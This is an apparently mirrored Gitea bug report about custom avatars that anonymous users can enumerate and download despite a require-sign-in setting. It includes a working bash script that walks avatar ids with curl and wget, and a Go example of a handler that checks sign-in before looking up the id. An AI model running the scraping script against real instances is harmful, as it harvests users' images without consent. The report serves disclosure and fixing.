Uploaded custom avatars enumerable and downloadable w/o login despite "Require Sign In View" being set #265

Closed
opened 2025-11-02 03:16:30 -06:00 by GiteaMirror · 0 comments
Owner

Originally created by @ghost on GitHub (Jan 22, 2017).

Description

Uploaded custom avatars remain enumerable by their numerical index without having to log in despite the setting "require sign in view" being set. This leaks information about local users (reverse image search, "real" profile pictures, etc) which is probably not intended. I suggest to require a login in this situation.

```bash
#!/bin/bash
# Walk /avatars/<n> by numeric index and download every avatar the server
# hands to an unauthenticated client (no cookies or credentials are sent).
BASEURL=$1
BOUND=10000

if [[ -z "$BASEURL" ]]; then
    echo "usage: $0 https://gitea.example" >&2
    exit 1
fi

# Return 0 when a HEAD request to $1 answers 200, 1 otherwise.
# curl prints 000 when the connection itself fails, so the comparison is safe.
check_http_status()
{
    local code
    code=$(curl -o /dev/null --silent --head --write-out '%{http_code}' "$1")
    if (( code == 200 )) ; then
        return 0
    else
        return 1
    fi
}

for ((i=1; i<BOUND; i++)); do
    URL="$BASEURL/avatars/$i"
    if check_http_status "$URL" ; then
        # Fetch in the background; the file is named after the avatar index.
        (wget -qO "$i" "$URL" &)
        echo -n +
    else
        echo -n _
    fi
done
echo
```

Use as:

```
./thescript https://your.private.gitea.instance.sexy
```
--- Want to back this issue? **[Post a bounty on it!](https://www.bountysource.com/issues/41210128-uploaded-custom-avatars-enumerable-and-downloadable-w-o-login-despite-require-sign-in-view-being-set?utm_campaign=plugin&utm_content=tracker%2F47456670&utm_medium=issues&utm_source=github)** We accept bounties via [Bountysource](https://www.bountysource.com/?utm_campaign=plugin&utm_content=tracker%2F47456670&utm_medium=issues&utm_source=github).
- Gitea version (or commit ref): 1.0.1
- Operating system: Debian 8.7
- Database (use `[x]`):
  - [ ] PostgreSQL
  - [ ] MySQL
  - [x] SQLite
- Can you reproduce the bug at https://try.gitea.io:
  - [ ] Yes (provide example URL) BUT
  - [ ] No
  - [x] Not relevant as the public instance doesn't have the setting in question set
- Log gist: https://gist.github.com/2ion/01f673323560ebe841dc93696ce2fd96
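The fix the report asks for is a server-side gate on the avatar route, not a change to the script. The following is an added example written for this page, not Gitea's code: a minimal net/http handler for `/avatars/<id>` in which a hypothetical `Settings.RequireSignInView` flag, a stand-in `isSignedIn` cookie check, and a constructed in-memory `avatars` map replace the real configuration, session and storage. `enumerate` replays the issue's anonymous HEAD loop against the handler so the leaky and the gated configuration can be compared side by side.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strconv"
	"strings"
)

// Settings holds the one option this example cares about. Hypothetical
// name; it is not Gitea's settings struct.
type Settings struct {
	RequireSignInView bool
}

// avatars is a constructed in-memory store keyed by numeric avatar id,
// standing in for the files under the avatar upload directory.
var avatars = map[int][]byte{
	1: []byte("\x89PNG constructed avatar for user 1"),
	7: []byte("\x89PNG constructed avatar for user 7"),
}

// isSignedIn is an assumption for the example: a non-empty "session"
// cookie counts as a logged-in user. A real server consults its session store.
func isSignedIn(r *http.Request) bool {
	c, err := r.Cookie("session")
	return err == nil && c.Value != ""
}

// avatarHandler serves /avatars/<id>. With RequireSignInView set, anonymous
// requests are rejected before the id is even parsed, so the response does
// not reveal whether an avatar with that index exists.
func avatarHandler(cfg Settings) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if cfg.RequireSignInView && !isSignedIn(r) {
			http.Error(w, "sign in required", http.StatusUnauthorized)
			return
		}
		id, err := strconv.Atoi(strings.TrimPrefix(r.URL.Path, "/avatars/"))
		if err != nil {
			http.NotFound(w, r)
			return
		}
		img, ok := avatars[id]
		if !ok {
			http.NotFound(w, r)
			return
		}
		w.Header().Set("Content-Type", "image/png")
		w.Write(img)
	})
}

// probe issues the same HEAD request the bash script sends and returns the
// status code, optionally carrying the stand-in session cookie.
func probe(h http.Handler, id int, signedIn bool) int {
	req := httptest.NewRequest(http.MethodHead, "/avatars/"+strconv.Itoa(id), nil)
	if signedIn {
		req.AddCookie(&http.Cookie{Name: "session", Value: "example"})
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

// enumerate mirrors the script's loop: ids 1..bound-1 that answer 200 to an
// anonymous HEAD request.
func enumerate(h http.Handler, bound int) []int {
	var found []int
	for i := 1; i < bound; i++ {
		if probe(h, i, false) == http.StatusOK {
			found = append(found, i)
		}
	}
	return found
}

func main() {
	leaky := avatarHandler(Settings{RequireSignInView: false})
	fixed := avatarHandler(Settings{RequireSignInView: true})
	fmt.Println("sign-in not required, anonymous enumeration finds:", enumerate(leaky, 20))
	fmt.Println("sign-in required, anonymous enumeration finds:", enumerate(fixed, 20))
	fmt.Println("sign-in required, logged-in user fetching id 7 gets:", probe(fixed, 7, true))
}
```

The ordering inside the handler matters: the sign-in check runs before the id lookup, so an anonymous client sees 401 for every index and cannot use a 401/404 difference to learn which user ids have custom avatars. Gating only the file read, after the existence check, would still leave the enumeration half of the report intact.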
GiteaMirror added the type/bugtopic/security labels 2025-11-02 03:16:30 -06:00

Reference: github-starred/gitea#265